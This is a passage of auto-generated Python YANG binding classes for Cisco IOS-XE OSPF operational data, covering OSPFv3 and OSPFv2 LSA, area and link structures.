                self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa, [], name, value)


            class Header(Entity):
                # YANG container 'header': OSPFv3 LSA id + option bits, with the
                # common header fields in the nested 'lsa-header' container.
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'

                def __init__(self):
                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, self).__init__()

                    self.yang_name = "header"
                    self.yang_parent_name = "ospfv3-lsa"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([("lsa-header", ("lsa_header", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader))])
                    self._leafs = OrderedDict([
                        ('lsa_id', (YLeaf(YType.str, 'lsa-id'), ['str','str'])),
                        ('lsa_hdr_options', (YLeaf(YType.bits, 'lsa-hdr-options'), ['Bits'])),
                    ])
                    self.lsa_id = None
                    self.lsa_hdr_options = Bits()

                    self.lsa_header = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader()
                    self.lsa_header.parent = self
                    self._children_name_map["lsa_header"] = "lsa-header"
                    self._segment_path = lambda: "header"
                    self._is_frozen = True

                def __setattr__(self, name, value):
                    self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header, ['lsa_id', 'lsa_hdr_options'], name, value)


                class LsaHeader(Entity):
                    # YANG container 'lsa-header': common LSA header fields.
                    _prefix = 'ospf-ios-xe-oper'
                    _revision = '2018-02-01'

                    def __init__(self):
                        super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, self).__init__()

                        self.yang_name = "lsa-header"
                        self.yang_parent_name = "header"
                        self.is_top_level_class = False
                        self.has_list_ancestor = True
                        self.ylist_key_names = []
                        self._child_classes = OrderedDict([])
                        self._leafs = OrderedDict([
                            ('age', (YLeaf(YType.uint16, 'age'), ['int'])),
                            ('type', (YLeaf(YType.uint16, 'type'), ['int'])),
                            ('adv_router', (YLeaf(YType.uint32, 'adv-router'), ['int'])),
                            ('seq_num', (YLeaf(YType.str, 'seq-num'), ['str'])),
                            ('checksum', (YLeaf(YType.str, 'checksum'), ['str'])),
                            ('length', (YLeaf(YType.uint16, 'length'), ['int'])),
                        ])
                        self.age = None
                        self.type = None
                        self.adv_router = None
                        self.seq_num = None
                        self.checksum = None
                        self.length = None
                        self._segment_path = lambda: "lsa-header"
                        self._is_frozen = True

                    def __setattr__(self, name, value):
                        self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.Header.LsaHeader, ['age', 'type', 'adv_router', 'seq_num', 'checksum', 'length'], name, value)


            class LsaBody(Entity):
                # YANG container 'lsa-body' under 'ospfv3-lsa'.
                # NOTE(review): definition continues beyond this chunk; the
                # remainder of __init__ is outside the visible range.
                _prefix = 'ospf-ios-xe-oper'
                _revision = '2018-02-01'

                def __init__(self):
                    super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, self).__init__()

                    self.yang_name = "lsa-body"
                    self.yang_parent_name = "ospfv3-lsa"
                    self.is_top_level_class = False
                    self.has_list_ancestor = True
                    self.ylist_key_names = []
                    self._child_classes = OrderedDict([("network", ("network",
OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network)), ("prefix", ("prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix)), ("ia-router", ("ia_router", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter)), ("lsa-external", ("lsa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal)), ("nssa", ("nssa", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa)), ("link-data", ("link_data", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData)), ("ia-prefix", ("ia_prefix", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix))]) self._leafs = OrderedDict([ ('lsa_flag_options', (YLeaf(YType.bits, 'lsa-flag-options'), ['Bits'])), ('lsa_body_flags', (YLeaf(YType.bits, 'lsa-body-flags'), ['Bits'])), ]) self.lsa_flag_options = Bits() self.lsa_body_flags = Bits() self.network = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network() self.network.parent = self self._children_name_map["network"] = "network" self.prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix() self.prefix.parent = self self._children_name_map["prefix"] = "prefix" self.ia_router = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter() self.ia_router.parent = self self._children_name_map["ia_router"] = "ia-router" self.lsa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal() self.lsa_external.parent = self self._children_name_map["lsa_external"] = "lsa-external" self.nssa = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa() self.nssa.parent = self self._children_name_map["nssa"] = "nssa" self.link_data = 
OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData() self.link_data.parent = self self._children_name_map["link_data"] = "link-data" self.ia_prefix = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix() self.ia_prefix.parent = self self._children_name_map["ia_prefix"] = "ia-prefix" self._segment_path = lambda: "lsa-body" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody, ['lsa_flag_options', 'lsa_body_flags'], name, value) class Network(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, self).__init__() self.yang_name = "network" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('attached_router', (YLeafList(YType.uint32, 'attached-router'), ['int'])), ('lsa_net_options', (YLeaf(YType.bits, 'lsa-net-options'), ['Bits'])), ]) self.attached_router = [] self.lsa_net_options = Bits() self._segment_path = lambda: "network" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Network, ['attached_router', 'lsa_net_options'], name, value) class Prefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, self).__init__() self.yang_name = "prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), 
('ia_prefix', (YLeaf(YType.str, 'ia-prefix'), ['str'])), ('ia_prefix_options', (YLeaf(YType.str, 'ia-prefix-options'), ['str'])), ]) self.metric = None self.ia_prefix = None self.ia_prefix_options = None self._segment_path = lambda: "prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Prefix, ['metric', 'ia_prefix', 'ia_prefix_options'], name, value) class IaRouter(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, self).__init__() self.yang_name = "ia-router" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('destination_router_id', (YLeaf(YType.uint32, 'destination-router-id'), ['int'])), ('lsa_ia_options', (YLeaf(YType.bits, 'lsa-ia-options'), ['Bits'])), ]) self.metric = None self.destination_router_id = None self.lsa_ia_options = Bits() self._segment_path = lambda: "ia-router" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaRouter, ['metric', 'destination_router_id', 'lsa_ia_options'], name, value) class LsaExternal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, self).__init__() self.yang_name = "lsa-external" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", 
OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), ['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" 
self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LsaExternal.Flags, ['e_flag'], name, value) class Nssa(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, self).__init__() self.yang_name = "nssa" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("lsa-nssa-external", ("lsa_nssa_external", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal))]) self._leafs = OrderedDict() self.lsa_nssa_external = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal() self.lsa_nssa_external.parent = self self._children_name_map["lsa_nssa_external"] = "lsa-nssa-external" self._segment_path = lambda: "nssa" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa, [], name, value) class LsaNssaExternal(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, self).__init__() self.yang_name = "lsa-nssa-external" self.yang_parent_name = "nssa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([("flags", ("flags", OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags))]) self._leafs = OrderedDict([ ('metric', (YLeaf(YType.uint32, 'metric'), ['int'])), ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('external_prefix', (YLeaf(YType.str, 'external-prefix'), 
['str'])), ('external_prefix_options', (YLeaf(YType.str, 'external-prefix-options'), ['str'])), ('forwarding_address', (YLeaf(YType.str, 'forwarding-address'), ['str','str'])), ('external_route_tag', (YLeaf(YType.uint32, 'external-route-tag'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ]) self.metric = None self.referenced_ls_type = None self.external_prefix = None self.external_prefix_options = None self.forwarding_address = None self.external_route_tag = None self.referenced_link_state_id = None self.flags = OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags() self.flags.parent = self self._children_name_map["flags"] = "flags" self._segment_path = lambda: "lsa-nssa-external" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal, ['metric', 'referenced_ls_type', 'external_prefix', 'external_prefix_options', 'forwarding_address', 'external_route_tag', 'referenced_link_state_id'], name, value) class Flags(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, self).__init__() self.yang_name = "flags" self.yang_parent_name = "lsa-nssa-external" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('e_flag', (YLeaf(YType.boolean, 'e-flag'), ['bool'])), ]) self.e_flag = None self._segment_path = lambda: "flags" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.Nssa.LsaNssaExternal.Flags, ['e_flag'], name, value) class LinkData(Entity): _prefix = 'ospf-ios-xe-oper' _revision = 
'2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, self).__init__() self.yang_name = "link-data" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('rtr_priority', (YLeaf(YType.uint8, 'rtr-priority'), ['int'])), ('link_local_interface_address', (YLeaf(YType.str, 'link-local-interface-address'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint32, 'num-of-prefixes'), ['int'])), ('lsa_id_options', (YLeaf(YType.bits, 'lsa-id-options'), ['Bits'])), ]) self.rtr_priority = None self.link_local_interface_address = None self.num_of_prefixes = None self.lsa_id_options = Bits() self._segment_path = lambda: "link-data" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.LinkData, ['rtr_priority', 'link_local_interface_address', 'num_of_prefixes', 'lsa_id_options'], name, value) class IaPrefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, self).__init__() self.yang_name = "ia-prefix" self.yang_parent_name = "lsa-body" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = [] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('referenced_ls_type', (YLeaf(YType.uint16, 'referenced-ls-type'), ['int'])), ('referenced_link_state_id', (YLeaf(YType.uint32, 'referenced-link-state-id'), ['int'])), ('referenced_adv_router', (YLeaf(YType.str, 'referenced-adv-router'), ['str','str'])), ('num_of_prefixes', (YLeaf(YType.uint16, 'num-of-prefixes'), ['int'])), ]) self.referenced_ls_type = None self.referenced_link_state_id = None self.referenced_adv_router = None self.num_of_prefixes = 
None self._segment_path = lambda: "ia-prefix" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Lsa.LsaBody.IaPrefix, ['referenced_ls_type', 'referenced_link_state_id', 'referenced_adv_router', 'num_of_prefixes'], name, value) class Ospfv3Link(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link, self).__init__() self.yang_name = "ospfv3-link" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['interface_id','neighbor_interface_id','neighbor_router_id'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('interface_id', (YLeaf(YType.uint32, 'interface-id'), ['int'])), ('neighbor_interface_id', (YLeaf(YType.uint32, 'neighbor-interface-id'), ['int'])), ('neighbor_router_id', (YLeaf(YType.uint32, 'neighbor-router-id'), ['int'])), ('type', (YLeaf(YType.uint8, 'type'), ['int'])), ('metric', (YLeaf(YType.uint16, 'metric'), ['int'])), ]) self.interface_id = None self.neighbor_interface_id = None self.neighbor_router_id = None self.type = None self.metric = None self._segment_path = lambda: "ospfv3-link" + "[interface-id='" + str(self.interface_id) + "']" + "[neighbor-interface-id='" + str(self.neighbor_interface_id) + "']" + "[neighbor-router-id='" + str(self.neighbor_router_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Link, ['interface_id', 'neighbor_interface_id', 'neighbor_router_id', 'type', 'metric'], name, value) class Ospfv3Prefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, self).__init__() self.yang_name = "ospfv3-prefix" 
self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3Prefix, ['prefix', 'prefix_options'], name, value) class Ospfv3IaPrefix(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, self).__init__() self.yang_name = "ospfv3-ia-prefix" self.yang_parent_name = "area-scope-lsa" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['prefix'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('prefix', (YLeaf(YType.str, 'prefix'), ['str'])), ('prefix_options', (YLeaf(YType.str, 'prefix-options'), ['str'])), ]) self.prefix = None self.prefix_options = None self._segment_path = lambda: "ospfv3-ia-prefix" + "[prefix='" + str(self.prefix) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.LinkScopeLsas.AreaScopeLsa.Ospfv3IaPrefix, ['prefix', 'prefix_options'], name, value) class MultiTopology(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.OspfState.OspfInstance.MultiTopology, self).__init__() self.yang_name = "multi-topology" self.yang_parent_name = "ospf-instance" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['name'] self._child_classes = OrderedDict([]) self._leafs = OrderedDict([ ('name', (YLeaf(YType.str, 
'name'), ['str'])), ]) self.name = None self._segment_path = lambda: "multi-topology" + "[name='" + str(self.name) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.OspfState.OspfInstance.MultiTopology, ['name'], name, value) class Ospfv2Instance(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance, self).__init__() self.yang_name = "ospfv2-instance" self.yang_parent_name = "ospf-oper-data" self.is_top_level_class = False self.has_list_ancestor = False self.ylist_key_names = ['instance_id'] self._child_classes = OrderedDict([("ospfv2-area", ("ospfv2_area", OspfOperData.Ospfv2Instance.Ospfv2Area)), ("ospfv2-lsdb-external", ("ospfv2_lsdb_external", OspfOperData.Ospfv2Instance.Ospfv2LsdbExternal))]) self._leafs = OrderedDict([ ('instance_id', (YLeaf(YType.uint32, 'instance-id'), ['int'])), ('vrf_name', (YLeaf(YType.str, 'vrf-name'), ['str'])), ('router_id', (YLeaf(YType.uint32, 'router-id'), ['int'])), ]) self.instance_id = None self.vrf_name = None self.router_id = None self.ospfv2_area = YList(self) self.ospfv2_lsdb_external = YList(self) self._segment_path = lambda: "ospfv2-instance" + "[instance-id='" + str(self.instance_id) + "']" self._absolute_path = lambda: "Cisco-IOS-XE-ospf-oper:ospf-oper-data/%s" % self._segment_path() self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance, ['instance_id', 'vrf_name', 'router_id'], name, value) class Ospfv2Area(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area, self).__init__() self.yang_name = "ospfv2-area" self.yang_parent_name = "ospfv2-instance" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['area_id'] self._child_classes = OrderedDict([("ospfv2-lsdb-area", ("ospfv2_lsdb_area", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea)), 
("ospfv2-interface", ("ospfv2_interface", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2Interface))]) self._leafs = OrderedDict([ ('area_id', (YLeaf(YType.uint32, 'area-id'), ['int'])), ]) self.area_id = None self.ospfv2_lsdb_area = YList(self) self.ospfv2_interface = YList(self) self._segment_path = lambda: "ospfv2-area" + "[area-id='" + str(self.area_id) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area, ['area_id'], name, value) class Ospfv2LsdbArea(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea, self).__init__() self.yang_name = "ospfv2-lsdb-area" self.yang_parent_name = "ospfv2-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['lsa_type','lsa_id','advertising_router'] self._child_classes = OrderedDict([("ospfv2-router-lsa-links", ("ospfv2_router_lsa_links", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks)), ("unsupported-lsa", ("unsupported_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa)), ("router-lsa", ("router_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa)), ("network-lsa", ("network_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa)), ("network-summary-lsa", ("network_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa)), ("router-summary-lsa", ("router_summary_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa)), ("external-lsa", ("external_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa)), ("nssa-lsa", ("nssa_lsa", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa))]) self._leafs = OrderedDict([ ('lsa_type', (YLeaf(YType.uint8, 'lsa-type'), ['int'])), ('lsa_id', (YLeaf(YType.uint32, 'lsa-id'), ['int'])), ('advertising_router', (YLeaf(YType.uint32, 
'advertising-router'), ['int'])), ('lsa_age', (YLeaf(YType.uint16, 'lsa-age'), ['int'])), ('lsa_options', (YLeaf(YType.bits, 'lsa-options'), ['Bits'])), ('lsa_seq_number', (YLeaf(YType.uint32, 'lsa-seq-number'), ['int'])), ('lsa_checksum', (YLeaf(YType.uint16, 'lsa-checksum'), ['int'])), ('lsa_length', (YLeaf(YType.uint16, 'lsa-length'), ['int'])), ]) self.lsa_type = None self.lsa_id = None self.advertising_router = None self.lsa_age = None self.lsa_options = Bits() self.lsa_seq_number = None self.lsa_checksum = None self.lsa_length = None self.unsupported_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.UnsupportedLsa() self.unsupported_lsa.parent = self self._children_name_map["unsupported_lsa"] = "unsupported-lsa" self.router_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterLsa() self.router_lsa.parent = self self._children_name_map["router_lsa"] = "router-lsa" self.network_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkLsa() self.network_lsa.parent = self self._children_name_map["network_lsa"] = "network-lsa" self.network_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NetworkSummaryLsa() self.network_summary_lsa.parent = self self._children_name_map["network_summary_lsa"] = "network-summary-lsa" self.router_summary_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.RouterSummaryLsa() self.router_summary_lsa.parent = self self._children_name_map["router_summary_lsa"] = "router-summary-lsa" self.external_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.ExternalLsa() self.external_lsa.parent = self self._children_name_map["external_lsa"] = "external-lsa" self.nssa_lsa = OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.NssaLsa() self.nssa_lsa.parent = self self._children_name_map["nssa_lsa"] = "nssa-lsa" self.ospfv2_router_lsa_links = YList(self) self._segment_path = lambda: "ospfv2-lsdb-area" + "[lsa-type='" + str(self.lsa_type) + "']" + "[lsa-id='" + str(self.lsa_id) + 
"']" + "[advertising-router='" + str(self.advertising_router) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea, ['lsa_type', 'lsa_id', 'advertising_router', 'lsa_age', 'lsa_options', 'lsa_seq_number', 'lsa_checksum', 'lsa_length'], name, value) class Ospfv2RouterLsaLinks(Entity): _prefix = 'ospf-ios-xe-oper' _revision = '2018-02-01' def __init__(self): super(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks, self).__init__() self.yang_name = "ospfv2-router-lsa-links" self.yang_parent_name = "ospfv2-lsdb-area" self.is_top_level_class = False self.has_list_ancestor = True self.ylist_key_names = ['link_type','link_id','link_data'] self._child_classes = OrderedDict([("link-topo", ("link_topo", OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks.LinkTopo))]) self._leafs = OrderedDict([ ('link_type', (YLeaf(YType.uint8, 'link-type'), ['int'])), ('link_id', (YLeaf(YType.uint32, 'link-id'), ['int'])), ('link_data', (YLeaf(YType.uint32, 'link-data'), ['int'])), ]) self.link_type = None self.link_id = None self.link_data = None self.link_topo = YList(self) self._segment_path = lambda: "ospfv2-router-lsa-links" + "[link-type='" + str(self.link_type) + "']" + "[link-id='" + str(self.link_id) + "']" + "[link-data='" + str(self.link_data) + "']" self._is_frozen = True def __setattr__(self, name, value): self._perform_setattr(OspfOperData.Ospfv2Instance.Ospfv2Area.Ospfv2LsdbArea.Ospfv2RouterLsaLinks, ['link_type', 'link_id', 'link_data'], name, value) class LinkTopo(Entity): _prefix = 